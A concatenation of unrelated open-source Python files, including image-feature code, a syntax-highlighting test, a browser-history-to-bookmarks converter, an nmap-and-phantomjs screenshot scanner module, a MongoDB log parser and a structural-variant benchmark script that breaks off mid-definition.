serialize(self): """ Serializes the current interval into a dict format :return: serialized dict """ return {"start": self.start, "end": self.end, "is_silent": self.is_silent} @staticmethod def deserialize(serialized_obj: dict): """ Deserializes a previously serializes Interval and generates a new Interval with this data :param serialized_obj: previously serializes Interval (type dict) :return: Interval """ return Interval(serialized_obj["start"], serialized_obj["end"], serialized_obj["is_silent"]) def __repr__(self): """ String representation :return: String representation """ return f"<Interval start={self.start} end={self.end} duration={self.duration} is_silent={self.is_silent}>"
mahotas/features/tas.py
langner/mahotas
541
11096777
<reponame>langner/mahotas # Copyright (C) 2008-2012, <NAME> <<EMAIL>> # vim: set ts=4 sts=4 sw=4 expandtab smartindent: # Carnegie Mellon University # # License: MIT (see COPYING file) import numpy as np from ..convolve import convolve from ..thresholding import otsu __all__ = ['pftas', 'tas'] _M2 = np.ones((3, 3)) _M2[1, 1] = 10 _bins2 = np.arange(11) _M3 = np.ones((3, 3, 3)) _M3[1,1,1] = _M3.sum() + 1 _bins3 = np.arange(28) def _tas(img, thresh, margin): if len(img.shape) == 2: M = _M2 bins = _bins2 saved = 9 elif len(img.shape) == 3: M = _M3 bins = _bins3 saved = 27 else: raise ValueError('mahotas.tas: Cannot compute TAS for image of %s dimensions' % len(img.shape)) def _ctas(img): V = convolve(img.astype(np.uint8), M) values,_ = np.histogram(V, bins=bins) values = values[:saved] s = values.sum() if s > 0: return values/float(s) return values def _compute(bimg): alltas.append(_ctas(bimg)) allntas.append(_ctas(~bimg)) alltas = [] allntas = [] total = np.sum(img > thresh) mu = ((img > thresh)*img).sum() / (total + 1e-8) _compute( (img > mu - margin) * (img < mu + margin) ) _compute(img > mu - margin) _compute(img > mu) return np.concatenate(alltas + allntas) def tas(img): ''' values = tas(img) Compute Threshold Adjacency Statistics TAS were presented by Hamilton et al. in "Fast automated cell phenotype image classification" (http://www.biomedcentral.com/1471-2105/8/110) Also returns a version computed on the negative of the binarisation defined by Hamilton et al. See also pftas() for a variation without any hardcoded parameters. Parameters ---------- img : ndarray, 2D or 3D input image Returns ------- values : ndarray A 1-D ndarray of feature values See Also -------- pftas : Parameter free TAS ''' return _tas(img, 30, 30) def pftas(img, T=None): ''' values = pftas(img, T={mahotas.threshold.otsu(img)}) Compute parameter free Threshold Adjacency Statistics TAS were presented by Hamilton et al. in "Fast automated cell phenotype image classification" (http://www.biomedcentral.com/1471-2105/8/110) The current version is an adapted version which is free of parameters. The thresholding is done by using Otsu's algorithm (or can be pre-computed and passed in by setting `T`), the margin around the mean of pixels to be included is the standard deviation. This was first published by Coelho et al. in "Structured Literature Image Finder: Extracting Information from Text and Images in Biomedical Literature" (http://www.springerlink.com/content/60634778710577t0/) Also returns a version computed on the negative of the binarisation defined by Hamilton et al. Use tas() to get the original version of the features. Parameters ---------- img : ndarray, 2D or 3D input image T : integer, optional Threshold to use (default: compute with otsu) Returns ------- values : ndarray A 1-D ndarray of feature values ''' if T is None: T = otsu(img) pixels = img[img > T].ravel() if len(pixels) == 0: std = 0 else: std = pixels.std() return _tas(img, T, std)
test/functions/lambda7.py
kylebarron/MagicPython
1,482
11096790
<filename>test/functions/lambda7.py anon = lambda a, c={'key': 555}, e=fff: None anon : source.python : source.python = : keyword.operator.assignment.python, source.python : source.python lambda : meta.lambda-function.python, source.python, storage.type.function.lambda.python : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python a : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python , : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.parameters.python, source.python : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python c : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python = : keyword.operator.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python { : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.dict.begin.python, source.python ' : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.string.begin.python, source.python, string.quoted.single.python key : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, string.quoted.single.python ' : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.string.end.python, source.python, string.quoted.single.python : : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.dict.python, source.python : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python 555 : constant.numeric.dec.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python } : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.dict.end.python, source.python , : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.parameters.python, source.python : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python e : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python = : keyword.operator.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python fff : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python : : meta.lambda-function.python, punctuation.section.function.lambda.begin.python, source.python : source.python None : constant.language.python, source.python
axes/__init__.py
LucienC/django-axes
831
11096813
<gh_stars>100-1000 from pkg_resources import get_distribution import django if django.VERSION < (3, 2): default_app_config = "axes.apps.AppConfig" __version__ = get_distribution("django-axes").version
17-it-generator/tree/extra/drawtree.py
fluentpython/example-code-2e
990
11096833
from tree import tree SP = '\N{SPACE}' HLIN = '\N{BOX DRAWINGS LIGHT HORIZONTAL}' # ─ ELBOW = f'\N{BOX DRAWINGS LIGHT UP AND RIGHT}{HLIN*2}{SP}' # └── TEE = f'\N{BOX DRAWINGS LIGHT VERTICAL AND RIGHT}{HLIN*2}{SP}' # ├── PIPE = f'\N{BOX DRAWINGS LIGHT VERTICAL}{SP*3}' # │ def render_lines(tree_iter): cls, _, _ = next(tree_iter) yield cls.__name__ prefix = '' for cls, level, last in tree_iter: prefix = prefix[:4 * (level-1)] prefix = prefix.replace(TEE, PIPE).replace(ELBOW, SP*4) prefix += ELBOW if last else TEE yield prefix + cls.__name__ def draw(cls): for line in render_lines(tree(cls)): print(line) if __name__ == '__main__': draw(BaseException)
build/build/root/opt/bin/py-chrome-history.py
scobiehague/dotfiles
117
11096842
<reponame>scobiehague/dotfiles<filename>build/build/root/opt/bin/py-chrome-history.py<gh_stars>100-1000 #!/usr/bin/python2 # py-chrome-history # # A script to convert Google Chrome's history file to the standard HTML-ish # bookmarks file format. # # Copyright (c) 2011 <NAME>. This program is released under the ISC # license, which you can find in the file LICENSE.md. import sys, os, sqlite3 script_version = "1.1" # html escaping code from http://wiki.python.org/moin/EscapingHtml html_escape_table = { "&": "&amp;", '"': "&quot;", "'": "&#39;", ">": "&gt;", "<": "&lt;", } def html_escape(text): return ''.join(html_escape_table.get(c,c) for c in text) def sanitize(string): res = '' string = html_escape(string) for i in range(len(string)): if ord(string[i]) > 127: res += '&#x%x;' % ord(string[i]) else: res += string[i] return res def version_text(): old_out = sys.stdout sys.stdout = sys.stderr print "py-chrome-history", script_version print "(c) 2011, <NAME>" print "https://github.com/bdesham/py-chrome-bookmarks" sys.stdout = old_out def help_text(): version_text() old_out = sys.stdout sys.stdout = sys.stderr print print "usage: python py-chrome-history input-file output-file" print " input-file is the Chrome history file" print " output-file is the destination for the generated HTML bookmarks file" sys.stdout = old_out # check for help or version requests if "-v" in sys.argv or "--version" in sys.argv: version_text() exit() if len(sys.argv) != 3 or "-h" in sys.argv or "--help" in sys.argv: help_text() exit() # the actual code here... in_file = os.path.expanduser(sys.argv[1]) out_file = os.path.expanduser(sys.argv[2]) connection = sqlite3.connect(in_file) curs = connection.cursor() try: out = open(out_file, 'w') except IOError, e: print >> sys.stderr, "py-chrome-history: error opening the output file." print >> sys.stderr, e exit() out.write("""<!DOCTYPE NETSCAPE-Bookmark-file-1> <meta http-equiv='Content-Type' content='text/html; charset=UTF-8' /> <title>Bookmarks</title> <h1>Bookmarks</h1> <dl><p> <dl><dt><h3>History</h3> <dl><p>""") curs.execute("SELECT url, title FROM urls") for row in curs: if len(row[1]) > 0: out.write('<dt><a href="%s">%s</a>\n' % (sanitize(row[0]), sanitize(row[1]))) connection.close() out.write("</dl></p>\n</dl>") out.close()
lib/screenscan.py
nkrios/flashlight
197
11096859
<filename>lib/screenscan.py try: import re import shlex import datetime import subprocess from lib.core.core import Core from lib.screen.webscan import WebScan from lib.core.threadpool import Worker,ThreadPool except ImportError, err: from lib.core.core import Core Core.print_error(err) class ScreenScan(WebScan): def __init__(self, args): self.__urls = [] self.__args = args WebScan.__init__(self, self.__args) def _run(self, logger): cmd = "{0} {1}".format(Core._commands_path["nmap"], self._nmap_options) logger._logging("START: Nmap Screen Scan: {0}".format(cmd)) cmd_list = shlex.split(cmd) proc = subprocess.Popen(cmd_list, stdout = subprocess.PIPE, stderr = subprocess.PIPE,).communicate() logger._logging("STOP: Nmap Screen Scan") self.__parse_nmap_scan(logger) def __parse_nmap_scan(self, logger): self._result_file.seek(0) for line in self._result_file: for port in self._scan_options.split(","): if re.search("{0}/open/tcp".format(port), line): ip = line.split()[1] if port != "443": self.__urls.append("http://{0}:{1}".format(ip,port)) else: self.__urls.append("https://{0}:443".format(ip)) self._result_file.close() if self.__urls: self.__take_screenshot(logger) def __take_screenshot(self, logger): logger._logging("START: Screen Scan {0} threads".format(self.__args.thread)) pool = ThreadPool(self.__args.thread) for url in self.__urls: output_file = "{0}{1}_{2}.png".format(self._output_dir, url.split("/")[2], datetime.datetime.now().strftime("%Y%m%d%H%M%S")) phantomjs_cmd = "{0} --ignore-ssl-errors=true {1} {2} {3}".format(Core._commands_path["phantomjs"], self.__args.rasterize, url, output_file) logger._logging("Taking screenshot: {0}".format(url.split("/")[2])) pool.add_task(self.__run_phantomjs, phantomjs_cmd) pool.wait_completion() logger._logging("Finished Screenshot Scan. Results saved in {0} folder".format(self._output_dir)) def __run_phantomjs(self, cmd): cmd_list = shlex.split(cmd) proc = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE,).communicate()
configs/detection/attention_rpn/coco/attention-rpn_r50_c4_4xb2_coco_official-10shot-fine-tuning.py
BIGWangYuDong/mmfewshot
376
11096860
<reponame>BIGWangYuDong/mmfewshot _base_ = [ '../../_base_/datasets/query_aware/few_shot_coco.py', '../../_base_/schedules/schedule.py', '../attention-rpn_r50_c4.py', '../../_base_/default_runtime.py' ] # classes splits are predefined in FewShotCocoDataset # FewShotCocoDefaultDataset predefine ann_cfg for model reproducibility num_support_ways = 2 num_support_shots = 9 data = dict( train=dict( num_support_ways=num_support_ways, num_support_shots=num_support_shots, repeat_times=50, dataset=dict( type='FewShotCocoDefaultDataset', ann_cfg=[dict(method='Attention_RPN', setting='Official_10SHOT')], num_novel_shots=10, classes='NOVEL_CLASSES', instance_wise=False)), val=dict( classes='NOVEL_CLASSES', ann_cfg=[ dict( type='ann_file', ann_file='data/coco/annotations/instances_val2017.json') ]), test=dict( classes='NOVEL_CLASSES', ann_cfg=[ dict( type='ann_file', ann_file='data/coco/annotations/instances_val2017.json') ]), model_init=dict(classes='NOVEL_CLASSES')) evaluation = dict(interval=3000) checkpoint_config = dict(interval=3000) optimizer = dict( lr=0.001, momentum=0.9, paramwise_cfg=dict(custom_keys={'roi_head.bbox_head': dict(lr_mult=2.0)})) lr_config = dict( warmup_iters=200, warmup_ratio=0.1, step=[ 2000, 3000, ]) log_config = dict(interval=10) runner = dict(max_iters=3000) # load_from = 'path of base training model' load_from = ('work_dirs/attention-rpn_r50_c4_4xb2_coco_official-base-training/' 'latest.pth') model = dict( frozen_parameters=['backbone'], rpn_head=dict( num_support_ways=num_support_ways, num_support_shots=num_support_shots, ), roi_head=dict( num_support_ways=num_support_ways, num_support_shots=num_support_shots, ), )
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/vertex_type_2_10_10_10_rev.py
ShujaKhalid/deep-rl
210
11096866
'''OpenGL extension ARB.vertex_type_2_10_10_10_rev This module customises the behaviour of the OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev to provide a more Python-friendly API Overview (from the spec) This extension adds the following data formats: Two new vertex attribute data formats: a signed 2.10.10.10 and an unsigned 2.10.10.10 vertex data format. These vertex data formats describe a 4 component stream which can be used to store normals or other attributes in a quantized form. Normals, tangents, binormals and other vertex attributes can often be specified at reduced precision without introducing noticeable artifacts, reducing the amount of memory and memory bandwidth they consume. The official definition of this extension is available here: http://www.opengl.org/registry/specs/ARB/vertex_type_2_10_10_10_rev.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev import * from OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev import _EXTENSION_NAME def glInitVertexType2101010RevARB(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) glVertexAttribP1uiv=wrapper.wrapper(glVertexAttribP1uiv).setInputArraySize( 'value', 1 ) glVertexAttribP2uiv=wrapper.wrapper(glVertexAttribP2uiv).setInputArraySize( 'value', 1 ) glVertexAttribP3uiv=wrapper.wrapper(glVertexAttribP3uiv).setInputArraySize( 'value', 1 ) glVertexAttribP4uiv=wrapper.wrapper(glVertexAttribP4uiv).setInputArraySize( 'value', 1 ) glVertexP2uiv=wrapper.wrapper(glVertexP2uiv).setInputArraySize( 'value', 1 ) glVertexP3uiv=wrapper.wrapper(glVertexP3uiv).setInputArraySize( 'value', 1 ) glVertexP4uiv=wrapper.wrapper(glVertexP4uiv).setInputArraySize( 'value', 1 ) glTexCoordP1uiv=wrapper.wrapper(glTexCoordP1uiv).setInputArraySize( 'coords', 1 ) glTexCoordP2uiv=wrapper.wrapper(glTexCoordP2uiv).setInputArraySize( 'coords', 1 ) glTexCoordP3uiv=wrapper.wrapper(glTexCoordP3uiv).setInputArraySize( 'coords', 1 ) glTexCoordP4uiv=wrapper.wrapper(glTexCoordP4uiv).setInputArraySize( 'coords', 1 ) glMultiTexCoordP1uiv=wrapper.wrapper(glMultiTexCoordP1uiv).setInputArraySize( 'coords', 1 ) glMultiTexCoordP2uiv=wrapper.wrapper(glMultiTexCoordP2uiv).setInputArraySize( 'coords', 1 ) glMultiTexCoordP3uiv=wrapper.wrapper(glMultiTexCoordP3uiv).setInputArraySize( 'coords', 1 ) glMultiTexCoordP4uiv=wrapper.wrapper(glMultiTexCoordP4uiv).setInputArraySize( 'coords', 1 ) glNormalP3uiv=wrapper.wrapper(glNormalP3uiv).setInputArraySize( 'coords', 1 ) glColorP3uiv=wrapper.wrapper(glColorP3uiv).setInputArraySize( 'color', 1 ) glColorP4uiv=wrapper.wrapper(glColorP4uiv).setInputArraySize( 'color', 1 ) glSecondaryColorP3uiv=wrapper.wrapper(glSecondaryColorP3uiv).setInputArraySize( 'color', 1 ) ### END AUTOGENERATED SECTION
dex/parsers.py
qintangtao/python.dex
291
11096876
__author__ = 'eric' import re from utils import pretty_json, small_json, yamlfy from time import strptime, mktime from datetime import datetime import traceback try: from collections import OrderedDict except ImportError: from ordereddict import OrderedDict ################################################################################ # Query masking and scrubbing functions ################################################################################ def scrub(e): if isinstance(e, dict): return scrub_doc(e) elif isinstance(e, list): return scrub_list(e) else: return None def scrub_doc(d): for k in d: if k in ['$in', '$nin', '$all']: d[k] = ["<val>"] else: d[k] = scrub(d[k]) if d[k] is None: d[k] = "<val>" return d def scrub_list(a): v = [] for e in a: e = scrub(e) if e is not None: v.append(scrub(e)) return sorted(v) ts_rx = re.compile('^(?P<ts>[a-zA-Z]{3} [a-zA-Z]{3} {1,2}\d+ \d{2}:\d{2}:\d{2}).*') def get_line_time(line): ts = None match = ts_rx.match(line) if match: year = datetime.utcnow().year timestamp = mktime(strptime(match.group('ts') + ' ' + str(year), '%a %b %d %H:%M:%S %Y')) ts = datetime.fromtimestamp(timestamp) return ts ################################################################################ # Parser # Provides a parse function that passes input to a round of handlers. ################################################################################ class Parser(object): def __init__(self, handlers): self._line_handlers = handlers def parse(self, input): """Passes input to each QueryLineHandler in use""" query = None for handler in self._line_handlers: try: query = handler.handle(input) except Exception as e: query = None finally: if query is not None: return query return None ################################################################################ # ProfileParser # Extracts queries from profile entries using a single ProfileEntryHandler ################################################################################ class ProfileParser(Parser): def __init__(self): """Declares the QueryLineHandlers to use""" super(ProfileParser, self).__init__([self.ProfileEntryHandler()]) def get_line_time(self, input): return input['ts'] if 'ts' in input else None ############################################################################ # Base ProfileEntryHandler class # Knows how to yamlfy a logline query ############################################################################ class ProfileEntryHandler: ######################################################################## def handle(self, input): result = OrderedDict() query = None orderby = None if (input is not None) and (input.has_key('op')): if input['op'] == 'query': if input['query'].has_key('$query'): query = input['query']['$query'] if input['query'].has_key('$orderby'): orderby = input['query']['$orderby'] else: query = input['query'] result['ns'] = input['ns'] elif input['op'] == 'update': query = input['query'] if input.has_key('updateobj'): if input['updateobj'].has_key('orderby'): orderby = input['updateobj']['orderby'] result['ns'] = input['ns'] elif ((input['op'] == 'command') and ((input['command'].has_key('count')) or (input['command'].has_key('findAndModify')))): query = input['command']['query'] db = input['ns'][0:input['ns'].rfind('.')] result['ns'] = db + "." + input['command']['count'] else: return None toMask = OrderedDict() if orderby is not None: result['orderby'] = orderby toMask['$orderby'] = orderby result['query'] = scrub(query) toMask['$query'] = query result['queryMask'] = small_json(toMask) result['stats'] = {'millis': input['millis']} return result else: return None ################################################################################ # LogParser # Extracts queries from log lines using a list of QueryLineHandlers ################################################################################ class LogParser(Parser): def __init__(self): """Declares the QueryLineHandlers to use""" super(LogParser, self).__init__([CmdQueryHandler(), UpdateQueryHandler(), StandardQueryHandler(), TimeLineHandler()]) ############################################################################ # Base QueryLineHandler class # Knows how to yamlfy a logline query ############################################################################ class QueryLineHandler: ######################################################################## def parse_query(self, extracted_query): return yamlfy(extracted_query) def handle(self, line): result = self.do_handle(line) if result is not None: result['ts'] = get_line_time(line) return result def do_handle(self, line): return None def parse_line_stats(self, stat_string): line_stats = {} split = stat_string.split(" ") for stat in split: if stat is not "" and stat is not None and stat != "locks(micros)": stat_split = stat.split(":") if (stat_split is not None) and (stat_split is not "") and (len(stat_split) is 2): try: line_stats[stat_split[0]] = int(stat_split[1]) except: pass return line_stats def standardize_query(self, query_yaml): if len(query_yaml.keys()) == 1: if '$query' in query_yaml: return scrub(query_yaml) if 'query' in query_yaml: return OrderedDict([('$query', scrub(query_yaml['query']))]) if len(query_yaml.keys()) == 2: query = None orderby = None if 'query' in query_yaml: query = query_yaml['query'] elif '$query' in query_yaml: query = query_yaml['$query'] if 'orderby' in query_yaml: orderby = query_yaml['orderby'] elif '$orderby' in query_yaml: orderby = query_yaml['$orderby'] if query is not None and orderby is not None: return OrderedDict([('$query', scrub(query)), ('$orderby', orderby)]) return OrderedDict([('$query', scrub(query_yaml))]) ############################################################################ # StandardQueryHandler # QueryLineHandler implementation for general queries (incl. getmore) ############################################################################ class StandardQueryHandler(QueryLineHandler): ######################################################################## def __init__(self): self.name = 'Standard Query Log Line Handler' self._regex = '.*\[(?P<connection>\S*)\] ' self._regex += '(?P<operation>\S+) (?P<ns>\S+\.\S+) query: ' self._regex += '(?P<query>\{.*\}) (?P<stats>(\S+ )*)' self._regex += '(?P<query_time>\d+)ms' self._rx = re.compile(self._regex) ######################################################################## def do_handle(self, input): match = self._rx.match(input) if match is not None: parsed = self.parse_query(match.group('query')) if parsed is not None: result = OrderedDict() scrubbed = self.standardize_query(parsed) result['query'] = scrubbed['$query'] if '$orderby' in scrubbed: result['orderby'] = scrubbed['$orderby'] result['queryMask'] = small_json(scrubbed) result['ns'] = match.group('ns') result['stats'] = self.parse_line_stats(match.group('stats')) result['stats']['millis'] = match.group('query_time') result['supported'] = True return result return None ############################################################################ # CmdQueryHandler # QueryLineHandler implementation for $cmd queries (count, findandmodify) ############################################################################ class CmdQueryHandler(QueryLineHandler): ######################################################################## def __init__(self): self.name = 'CMD Log Line Handler' self._regex = '.*\[conn(?P<connection_id>\d+)\] ' self._regex += 'command (?P<db>\S+)\.\$cmd command: ' self._regex += '(?P<query>\{.*\}) (?P<stats>(\S+ )*)' self._regex += '(?P<query_time>\d+)ms' self._rx = re.compile(self._regex) ######################################################################## def do_handle(self, input): match = self._rx.match(input) if match is not None: parsed = self.parse_query(match.group('query')) if parsed is not None: result = OrderedDict() result['stats'] = self.parse_line_stats(match.group('stats')) result['stats']['millis'] = match.group('query_time') command = parsed.keys()[0] toMask = OrderedDict() result['command'] = command result['supported'] = True if command.lower() == 'count': result['ns'] = match.group('db') + '.' result['ns'] += parsed[command] query = self.standardize_query(parsed['query']) result['query'] = query['$query'] toMask = query elif command.lower() == 'findandmodify': if 'sort' in parsed: result['orderby'] = parsed['sort'] toMask['$orderby'] = parsed['sort'] result['ns'] = match.group('db') + '.' result['ns'] += parsed[command] query = self.standardize_query(parsed['query']) result['query'] = query['$query'] if 'sort' in parsed: result['orderby'] = parsed['sort'] toMask['$orderby'] = parsed['sort'] toMask['$query'] = query elif command.lower() == 'geonear': result['ns'] = match.group('db') + '.' result['ns'] += parsed[command] query = self.standardize_query(parsed['search']) result['query'] = query toMask = query else: result['supported'] = False result['ns'] = match.group('db') + '.$cmd' result['command'] = command toMask['$cmd'] = command result['queryMask'] = small_json(toMask) return result return None ############################################################################ # UpdateQueryHandler # QueryLineHandler implementation for update queries ############################################################################ class UpdateQueryHandler(QueryLineHandler): ######################################################################## def __init__(self): self.name = 'Update Log Line Handler' self._regex = '.*\[conn(?P<connection_id>\d+)\] ' self._regex += 'update (?P<ns>\S+\.\S+) query: ' self._regex += '(?P<query>\{.*\}) update: (?P<update>\{.*\}) ' self._regex += '(?P<stats>(\S+ )*)(?P<query_time>\d+)ms' self._rx = re.compile(self._regex) ######################################################################## def do_handle(self, input): match = self._rx.match(input) if match is not None: parsed = self.parse_query(match.group('query')) if parsed is not None: result = OrderedDict() scrubbed = self.standardize_query(parsed) result['query'] = scrubbed['$query'] if '$orderby' in scrubbed: result['orderby'] = scrubbed['$orderby'] result['queryMask'] = small_json(scrubbed) result['ns'] = match.group('ns') result['stats'] = self.parse_line_stats(match.group('stats')) result['stats']['millis'] = match.group('query_time') result['supported'] = True return result return None ############################################################################ # Empty TimeLineHandler class # Last Resort for unparsed lines ############################################################################ class TimeLineHandler(QueryLineHandler): ######################################################################## def __init__(self): self.name = 'Standard Query Log Line Handler' self._regex = '.*(?P<query_time>\d+)ms' self._rx = re.compile(self._regex) ######################################################################## def do_handle(self, input): match = self._rx.match(input) if match is not None: return {'ns': "?", 'stats': {"millis": match.group('query_time')}, 'supported': False, 'queryMask': None } return None
src/benchmarks/cmp_NA19240.py
npinter/cuteSV
116
11096887
<filename>src/benchmarks/cmp_NA19240.py import sys import argparse import logging import time callset = {1: "cuteSV", 2: "Sniflles", 3: "PBSV", 4: "SVIM"} USAGE="""\ Evaluate SV callset on NA19240 dataset """ def parseArgs(argv): parser = argparse.ArgumentParser(prog="NA19240_eval", description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("base", type=str, help="Base vcf file of NA19240.") parser.add_argument("cuteSV", type=str, help="CuteSV vcf file of NA19240.") parser.add_argument("sniffles", type=str, help="Sniffles vcf file of NA19240.") parser.add_argument("pbsv", type=str, help="PBSV vcf file of NA19240.") parser.add_argument("svim", type=str, help="SVIM vcf file of NA19240.") parser.add_argument('-b', '--bias', help = "Bias of overlaping.[%(default)s]", default = 0.7, type = float) parser.add_argument('-o', '--offect', help = "Offect of breakpoint distance.[%(default)s]", default = 1000, type = int) args = parser.parse_args(argv) return args def pase_base_info(seq): info = {'SVLEN': 0, 'END': 0, "SVTYPE": '', "RE": 0} for i in seq.split(';'): if i.split('=')[0] in ["SVLEN", "END", "RE"]: try: info[i.split('=')[0]] = abs(int(i.split('=')[1])) except: pass if i.split('=')[0] == "SVTYPE": info[i.split('=')[0]] = i.split('=')[1][0:3] return info def load_base(base_path): base_call = dict() file = open(base_path, 'r') for line in file: seq = line.strip('\n').split("\t") if seq[0][0] == '#': continue chr = seq[0] pos = int(seq[1]) ALT = seq[4][1:4] if ALT not in ["INS", "INV", "DEL", "DUP"]: continue if ALT == "DUP": ALT = "INS" info = pase_base_info(seq[7]) if ALT not in base_call: base_call[ALT] = dict() if chr not in base_call[ALT]: base_call[ALT][chr] = list() if ALT == "INV": base_call[ALT][chr].append([pos, info["END"] - pos + 1, info["END"], 0]) else: if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000: base_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0]) file.close() return base_call def load_cuteSV(cuteSV_path): # inv_tag = 0 last_inv = list() cuteSV_call = dict() file = open(cuteSV_path, 'r') for line in file: seq = line.strip('\n').split("\t") if seq[0][0] == '#': continue chr = seq[0] pos = int(seq[1]) ALT = seq[2][7:10] # if ALT == "DUP": # ALT = "INS" if ALT not in ["INS", "INV", "DEL", "DUP"]: continue info = pase_base_info(seq[7]) if ALT not in cuteSV_call: cuteSV_call[ALT] = dict() if chr not in cuteSV_call[ALT]: cuteSV_call[ALT][chr] = list() if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000: if ALT == "INV": last_inv.append([ALT, chr, pos, info["SVLEN"], info["END"], info["RE"]]) # if inv_tag == 0 else: cuteSV_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0]) # inv_tag = 0 if len(last_inv): last_inv = sorted(last_inv, key = lambda x:-x[3]) cuteSV_call[last_inv[0][0]][last_inv[0][1]].append([last_inv[0][2], last_inv[0][3], last_inv[0][4], 0]) last_inv = list() file.close() return cuteSV_call def load_sniffles(sniffles_path): sniffles_call = dict() last_inv = list() file = open(sniffles_path, 'r') for line in file: seq = line.strip('\n').split("\t") if seq[0][0] == '#': continue chr = seq[0] pos = int(seq[1]) info = pase_base_info(seq[7]) if info["SVTYPE"] not in ["INS", "INV", "DEL", "DUP"]: continue # if info["SVTYPE"] == "DUP": # info["SVTYPE"] = "INS" if info["SVTYPE"] not in sniffles_call: sniffles_call[info["SVTYPE"]] = dict() if chr not in sniffles_call[info["SVTYPE"]]: sniffles_call[info["SVTYPE"]][chr] = list() if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000: if info["SVTYPE"] == "INV": last_inv.append([info["SVTYPE"], chr, pos, info["SVLEN"], info["END"], info["RE"]]) else: sniffles_call[info["SVTYPE"]][chr].append([pos, info["SVLEN"], info["END"], 0]) if len(last_inv): last_inv = sorted(last_inv, key = lambda x:-x[3]) sniffles_call[last_inv[0][0]][last_inv[0][1]].append([last_inv[0][2], last_inv[0][3], last_inv[0][4], 0]) last_inv = list() file.close() return sniffles_call def load_pbsv(pbsv_path): pbsv_call = dict() file = open(pbsv_path, 'r') for line in file: seq = line.strip('\n').split("\t") if seq[0][0] == '#': continue chr = seq[0] pos = int(seq[1]) info = pase_base_info(seq[7]) if info["SVTYPE"] not in ["INS", "INV", "DEL", "DUP"]: continue # if info["SVTYPE"] == "DUP": # info["SVTYPE"] = "INS" if info["SVTYPE"] not in pbsv_call: pbsv_call[info["SVTYPE"]] = dict() if chr not in pbsv_call[info["SVTYPE"]]: pbsv_call[info["SVTYPE"]][chr] = list() if info["SVTYPE"] == "INV": pbsv_call[info["SVTYPE"]][chr].append([pos, info["END"] - pos + 1, info["END"], 0]) else: if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000: pbsv_call[info["SVTYPE"]][chr].append([pos, info["SVLEN"], info["END"], 0]) file.close() return pbsv_call def load_svim(base_path): base_call = dict() file = open(base_path, 'r') for line in file: seq = line.strip('\n').split("\t") if seq[0][0] == '#': continue chr = seq[0] pos = int(seq[1]) ALT = seq[4][1:4] if ALT not in ["INS", "INV", "DEL", "DUP"]: continue # if ALT == "DUP": # ALT = "INS" info = pase_base_info(seq[7]) if ALT not in base_call: base_call[ALT] = dict() if chr not in base_call[ALT]: base_call[ALT][chr] = list() if ALT == "INV": base_call[ALT][chr].append([pos, info["END"] - pos + 1, info["END"], 0]) else: if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000: base_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0]) file.close() return base_call def cmp_callsets(base, call, flag, Bias, Offect): for svtype in base: if svtype not in call: continue else: for chr in base[svtype]: if chr not in call[svtype]: continue else: for i in base[svtype][chr]: for j in call[svtype][chr]: if i[0] - Offect <= j[0] <= i[2] + Offect or i[0] - Offect <= j[2] <= i[2] + Offect or j[0] - Offect <= i[0] <= j[2] + Offect: if min(i[1], j[1])*1.0/max(i[1], j[1]) >= Bias: i[3] = flag j[3] = flag else: pass total_base = 0 tp_base = 0 # for svtype in ["INS"]: # for svtype in ["DUP"]: # for svtype in ["DEL"]: # for svtype in ["INS", "DEL"]: for svtype in ["INS", "DEL", "INV"]: # for svtype in ["INS", "DEL", "INV", "DUP"]: # for svtype in ["INV"]: for chr in base[svtype]: for i in base[svtype][chr]: total_base += 1 if i[3] == flag: tp_base += 1 # else: # print(flag, svtype, chr, i[0], i[1], i[2]) # logging.info("Base count: %d"%(total_base)) # logging.info("TP-base count: %d"%(tp_base)) logging.info("====%s===="%(callset[flag])) total_call = 0 tp_call = 0 # for svtype in ["INS"]: # for svtype in ["DUP"]: # for svtype in ["DEL"]: # for svtype in ["INS", "DEL"]: for svtype in ["INS", "DEL", "INV"]: # for svtype in ["INS", "DEL", "INV", "DUP"]: # for svtype in ["INV"]: for chr in call[svtype]: for i in call[svtype][chr]: total_call += 1 if i[3] == flag: tp_call += 1 logging.info("Camp count: %d"%(total_call)) logging.info("TP-call count: %d"%(tp_call)) logging.info("Precision: %.2f"%(100.0*tp_call/total_call)) logging.info("Recall: %.2f"%(100.0*tp_base/total_base)) logging.info("F-measure: %.2f"%(200.0*tp_base*tp_call/(total_base*tp_call+tp_base*total_call))) def 